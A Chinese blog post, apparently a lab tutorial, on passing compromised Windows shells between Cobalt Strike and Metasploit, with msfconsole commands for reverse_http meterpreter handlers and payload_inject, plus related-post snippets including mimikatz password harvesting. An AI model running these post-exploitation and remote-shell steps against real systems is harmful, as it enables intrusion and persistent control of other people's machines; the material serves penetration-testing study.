msf与cs互传shell

已于 2022-05-05 16:51:40 修改
阅读量3.3k 收藏 15
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 内网攻防 文章标签: msf与cs互传shell
于 2022-04-19 18:29:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/124278770
本文详细介绍了如何在Cobalt Strike(CS)和Metasploit Framework(MSF)之间传递shell,包括CS将shell传给MSF以及MSF将shell回传给CS的过程。通过设置监听器和利用特定模块,实现了两个工具间shell的独立运作,增强了渗透测试的灵活性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

cs传shell给msf

msf传shell给cs

因为cobaltstrike和MSF各有优势,所有有时候需要互传shell。

  • cs: 192.168.110.130
  • msf:192.168.110.130
  • 靶机:192.168.110.157

cs传shell给msf

假设cs此时获取了一个shell,然后需要将此shell传给msf

1. 在msf中创建反向监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.110.130     #如果为云服务,则填写公网ip地址
set lport 4444

2. cs创建监听器,名字为msf

选择Foreign http

3. cs执行监听器  spawn msf

此时msf收到了shell

可见是从靶机直接将shell传给msf的,此时的shell不依赖cs。cs退出此shell也不会断。

msf传shell给cs

1. cs创建监听器

选择的是http方式连接

2. msf派生shell

先把会话放到后台,设置如下。因为cs上设置的为http连接,所以我们下边payload也要对应的设置为reverse_tcp

#派生一个新的shell给cs,那么msf里面用到的exploit是
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
#禁止产生一个新的handler
set disablepayloadhandler true
#设置ip端口为cs监听的
set LHOST IP
set LPORT 端口
set session 3
run

执行run

执行之后即可得到一个cs的会话

 同样,此shell也不依赖于原来msf的shell。msf shell关闭此shell依然可用

Csmsf互传shell
2201_75387456的博客
06-02 516
首先咋们需要准备两台kali,一台win10靶机咋们利用kali1打开cs,利用kali2打开msf进行联动;在cs上建立一个监听,名字随便起,这里我起名为test,ip输入kali1的;生成一段payload,并在win10靶机上线(在win10点击生成的payload即可)然后在kali2启动msf,使用监听模块命令:msfconsole //进入msf控制台use exploit/multi/handler //进入监听模块。
利用frp将csshell派生msf
weixin_43939009的博客
06-27 846
msf作为内网渗透中强大的工具,集成了许多漏洞利用的EXP,以及各种扫描功能便于使用,今天介绍使用Frp将csshell派生msf,满足内网渗透中的需求。 第一步: 首先我们连上cs后,我们需要去监听器修改参数。 我们这里Add添加一个,随便写个名字,这里我写了msf,模式选择foreign HTTP模式,HTTP Host出填写自己的VPS地址,端口随意,我这里是1080端口。填写完毕Save即可。 第二步: 在自己的vps上启动frp服务端,frp不多做介绍,目前主流的内网穿透工具,这里基础使用
msf派生cs
weixin_48776804的博客
07-19 608
msf派生cs
CS会话派生MSF会话
weixin_43047908的博客
08-16 1922
目录前言环境设置外部监听msf建立监听CS派生会话msfshell传给CS 前言 有时候,我们通过cs拿到一些机器的shell,想利用msf中的一些功能,这个时候,需要我们将shell传给msf之中,这也是本文的主要内容。 另外,msf也可以将shell传给CS。但是因为CSshell比较方便,所以,多数情况下是CS传给MSF。 环境设置 我们cs已经拿下一台机器的shell。不在过多赘述。 外部监听 msf建立监听 注意,“ lhost ”是指本机IP的意思;“ rhost ”才是目标机器的IP
msfcs联动
bring_coco的博客
05-18 2230
环境:kali(192.168.190.128)NATAPP。
CSMSF联动/shell互相反弹
qq_59468567的博客
04-12 584
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true。set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的。先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip。此处标红的对应下面的两个,取决加不加。然后返回前面的增加会话。
msf派生cs shell
最新发布
01-05
### 如何从Metasploit Framework生成或派生C# Shellcode 为了实现这一目标,可以利用`msfvenom`工具来创建原始shellcode并将其转换为适用于C#环境的形式。具体过程涉及几个关键步骤。 #### 使用 `msfvenom` 创建...
CSMSF的权限互相传递/mimikatz抓取windows 2012明文密码
qq_68163788的博客
06-26 1782
CS(Cobalt Strike)和MSF(Metasploit Framework)是两种常用的渗透测试工具,用于测试网络安全并获取权限。此外,mimikatz是一款功能强大的工具,可以用于抓取Windows系统中的明文密码。通过修改注册表和等待目标系统管理员重新登录,可以使得明文口令在lsass进程中保存。这样一旦管理员重新登录,mimikatz就可以成功地抓取到明文密码。这些工具在渗透测试和网络安全领域中具有重要的作用。
2021-06-30csmsf联动派生会话shell
qq_45290991的博客
06-30 745
一、当cs获取到会话后反弹给msf 1、msf上操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.52.208 set lport 7777 exploit -j #-j 后台监听 12345 2、...
Cobalt Strike之msf互相派生shell
shy的博客
10-28 3058
一,msf派生shell给cobalstrike 1,cs添加监听器 2,msf上在已经获取到的会话(shell)中注入一个新的payload msf exploit(handler) > use exploit/windows/local/payload_inject msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http //cs监听器中相同 msf exploit(payload
MSFCobaltStrike联动相互会话派生,并通过MSF进行内网攻击
da_chuan_chuan的博客
04-27 2157
文章目录前言一、将CS会话派生MSF1、前期准备:2、Cobaltstrike派生会话给MSF二、MSF进行内网攻击1、前言:2、攻击步骤如下三、将MSF中的会话派生CS1、前言2、使用步骤:总结 前言 本文主要介绍MSFCobaltStrike联动相互进行会话派生,这样可以最大化利用这两个工具的优点。同时这里还进行了衍生,通过将会话传到MSF上,MSF通过添加路由来访问内网主机,再用MSF进行永恒之蓝攻击拿下shell,并派生回CobaltStrkie。 当前网络设置为: 一、将CS会话派
MSFCS联动】
一纸荒芜的博客
08-27 3112
msfcs
MSFCS之间会话传递,互相派生,版本问题踩坑
qq_29060627的博客
10-12 960
cobaltstrike使用版本4.5,可以msf派生cs4.5,但是cs4.5不能派生msf,得换cobaltstrike4.1的版本。
CS安装smf互联
XiaoYeZhu_1314的博客
09-09 1226
第三步:就打开cs4.8的client端选择vbs启动,输入我们上面配置好了的IP和密码,端口默认50050【端口可以自己改】第二步:把cs的安装包复制进kali中【这里我是把cs的安装包放到桌面上的】,打开severs端,进行配置。有效载荷-》wind可执行程序【版本是64位的就勾选】,生成后门【这里用我自己的本机做实验】上线成功。第一次使用会出现这个【要确定这个指纹是否团队服务器启动时显示的指纹相匹配】直接点击“是”就行了。第一步:在MSF中设置监听【IP地址为kali的IP】的payload。
Cobalt_StrikeMetasploit(msf)联动-Win或Linux不同系统之间互相弹shell
09-06 2856
Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的csmsf互相反弹shell。Linux系统被控主机的反弹shellcscs上的Linux主机反弹shellmsf
MSFCS联动
GoDunTong's Blog
04-08 4470
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
MSFCS会话互相传递
fishfishfishman的博客
08-15 994
作为C2工具,MSFCS各有千秋,CS有着多种强大的自定义插件和易操作的图形化界面,而MSF集成了针对各类系统的Payload攻击代码,为了针对性的进行攻击,我们有时候会需要将MSF的会话转发到CS,或者相反。
Cobaltstrike系列教程(十二)CSMSF,Armitage,Empire会话互转
J0o1ey Blog
01-19 2793
0x001-CobaltstrikeMSF会话互转 ①Metasploit派生shell给Cobaltstrike 首先,你需要拿到一个metepreter会话,本例中session为1 Cobaltstrike的teamserver的ip为8.8...
CSMSF联动之派生会话
Zlirving_的博客
02-19 1915
CS 派生会话到MSF 当我们CS上线后,先打开msf,启动监听模块 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost xxxx set lport xxxx exploit 然后在CS新建一个外部监听 两边的payload协议一定要对应的 然后选择需要派生的会话右击—>Spawn然后选择刚刚创建的监听 MSF 派生会话给CS 先在 cs 开启监听,Cobalt Strike-&g
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值